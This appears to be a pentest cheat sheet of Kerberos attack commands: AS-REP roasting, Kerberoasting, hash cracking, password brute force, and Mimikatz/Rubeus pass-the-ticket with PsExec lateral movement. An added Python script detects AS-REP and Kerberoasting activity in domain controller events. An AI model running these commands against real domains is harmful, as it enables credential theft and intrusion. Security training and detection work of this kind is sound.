Kerberoast
Tools
Rubeus: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe
Kerbrute: https://github.com/ropnop/kerbrute
Impacket: https://github.com/SecureAuthCorp/impacket
ASREP-Roast
Impacket
# ASREP check on all domain Users (Requires valid domain credentials)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep '\$krb5asrep\$'
# ASREP check on a list of domain users (Does not require domain credentials)
python2 GetNPUsers.py <Domain>/ -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep '\$krb5asrep\$'
Rubeus
# Extract from all domain accounts
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt
Cracking
# Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
# Linux
john --wordlist=rockyou.txt --format=krb5asrep Hashes.txt
hashcat -m 18200 -a 0 Hashes.txt rockyou.txt
Brute Force
Kerbrute
Download: https://github.com/ropnop/kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>
Rubeus
# with a list of users
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>
# Check all domain users against a password list
.\Rubeus.exe brute /passwords:<Wordlist>
Kerberoasting
Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request
Rubeus
# Kerberoast all users in Domain
.\Rubeus.exe kerberoast
# All Users in OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local
# Specific users
.\Rubeus.exe kerberoast /user:File_SVC
Pass-The-Ticket
Mimikatz
# Collect tickets
sekurlsa::tickets /export
# Inject ticket
kerberos::ptt <.kirbi file>
# Spawn CMD with the injected ticket
misc::cmd
Rubeus
# Collect tickets
.\Rubeus.exe dump
# Inject ticket
.\Rubeus.exe ptt /ticket:<.kirbi file>
PsExec
# To be used after injecting ticket with either Rubeus or Mimikatz
.\PsExec.exe -accepteula \\<IP> cmd
Silver Ticket
Golden Ticket
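Detection-side view of the ASREP-Roast and Kerberoasting sections above, as an added example that is not part of the original page: it scans exported domain controller Security events 4768/4769 for TGTs issued without pre-authentication and for one requester pulling RC4 service tickets for several user-backed SPNs. The sample events, the legacy_app, SQL_SVC and Web_SVC names, the addresses and the threshold of three services are constructed assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23 (RC4-HMAC)

# Constructed sample records; field names follow Security events 4768 and 4769.
EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.21"},
    {"EventID": 4768, "TargetUserName": "legacy_app", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.66"},
    {"EventID": 4769, "TargetUserName": "carol@SECURITY.LOCAL", "ServiceName": "File_SVC",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "TargetUserName": "bob@SECURITY.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.66"},
] + [
    {"EventID": 4769, "TargetUserName": "bob@SECURITY.LOCAL", "ServiceName": svc,
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.66"}
    for svc in ("File_SVC", "SQL_SVC", "Web_SVC")
]


def asrep_candidates(events):
    """TGT requests (4768) answered without pre-authentication (PreAuthType 0)."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == "0"]


def kerberoast_candidates(events, min_services=3):
    """Requesters that pulled RC4 service tickets (4769) for several user-backed SPNs."""
    seen = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine-account and krbtgt tickets are routine noise
        seen[(e["TargetUserName"], e["IpAddress"])].add(svc)
    return {who: sorted(svcs) for who, svcs in seen.items() if len(svcs) >= min_services}


if __name__ == "__main__":
    for user, ip in asrep_candidates(EVENTS):
        print(f"AS-REP without pre-auth: {user} from {ip}")
    for (user, ip), svcs in kerberoast_candidates(EVENTS).items():
        print(f"RC4 service-ticket burst: {user} from {ip} -> {', '.join(svcs)}")
```

Feed it events from a bounded time window, since the threshold counts distinct services per requester across everything it is given.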